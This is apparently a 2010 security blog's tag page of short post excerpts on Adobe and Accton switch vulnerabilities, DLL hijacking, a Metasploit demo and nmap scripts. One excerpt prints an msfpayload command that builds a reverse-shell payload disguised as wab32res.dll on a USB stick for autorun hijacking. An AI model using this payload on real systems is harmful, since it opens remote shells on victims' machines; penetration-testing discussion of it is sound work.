Posts Tagged ‘vulnerability’
Really, Adobe?
Posted: 20th September 2010 by Matt in code, hacks, news, security
Tags: 0day, Acrobat, Adobe, cooltype, corporate, dll, exploitation, information, own, PDF, penetration, SING, software, strncat, SumatraPDF, vulnerability, Xpdf
So, I’ve come across a lot more information regarding the no-longer-0day Adobe vulnerability (oh, wait, that’s right.. there have been like, 12 in the last 30 days.. I’m referring just to the SING table one). Anyway, a penetration testing company named Ramz Afzar has released an unofficial patch to fix the Adobe vulnerability, because apparently [...]
An Open Letter to Microsoft
Posted: 8th September 2010 by Matt in news, security
Tags: Apache, Blaster, Boink, Bonk, code, Code Red, company, computer, Conficker, crash, denial of service, denial of service attack, exploits, Frag, IIS, ILOVEYOU, irc, Land, Linux, Microsoft, MyDoom, Nestea, NewTear, Nimda, Sandmind, Sasser, Sircam, Slammer, SoBig, Sping, spyware, SQL, TearDrop, vulnerability, vulnerable, Windows, WinNuke, worm
Dear Microsoft, I have watched you develop as a company, starting with Windows 3.1. It was most people’s first experience with a PC and considering that there was really no other marketed OS (Linux was brand new and not really totally “usable” yet. I ran it, but it was not for the faint of heart. [...]
Backdoor Password in Accton Based Switches
Posted: 2nd September 2010 by Matt in code, hacks, security
Tags: Accton, Accton-based, backdoor, concept, Dell PowerConnect, EdgeCore, Edwin Eefting, Erik Smit, Erwin Drent, exploit, firmware, Foundry, passwords, perl, PoC, proof, SNMP, vulnerability
This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. [BEGIN REGURGITATION [...]
Autorun DLL Hijacker (USB stick)
Posted: 26th August 2010 by Matt in code, hacks, security
Tags: 0day, autorun, dll, exploit, hack, hijacker, Hijacking, network security audit, USB, vulnerability
I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome.
# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58
Video Demo of DLL Hijacking Attack.
Posted: 26th August 2010 by Matt in hacks, security
Tags: 0day, address book, dll, exploit, hack, hijack, Microsoft, vulnerability, webdav_dll_hijacker
This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll). (Best viewed in fullscreen mode in 480p or higher. YouTube absolutely killed the video quality. Thanks YouTube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]
Favorite nmap NSE scripts
Posted: 25th August 2010 by Matt in code, hacks, security
Tags: Administrator, attack, brute force, dns-zone-transfer, dnszonetransfer, enum, Enumeration, hack, http-enum, MS08-067, nmap, nse, nsedoc, scripts, smb-brute, smb-check-vulns, smb-enum-users, snmp-netstat, snmp-processes, snmp-win32-services, snmp-win32-shares, snmp-win32-users, transfer, vulnerability
I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1 (The DefCon release.. oooh.)). The [...]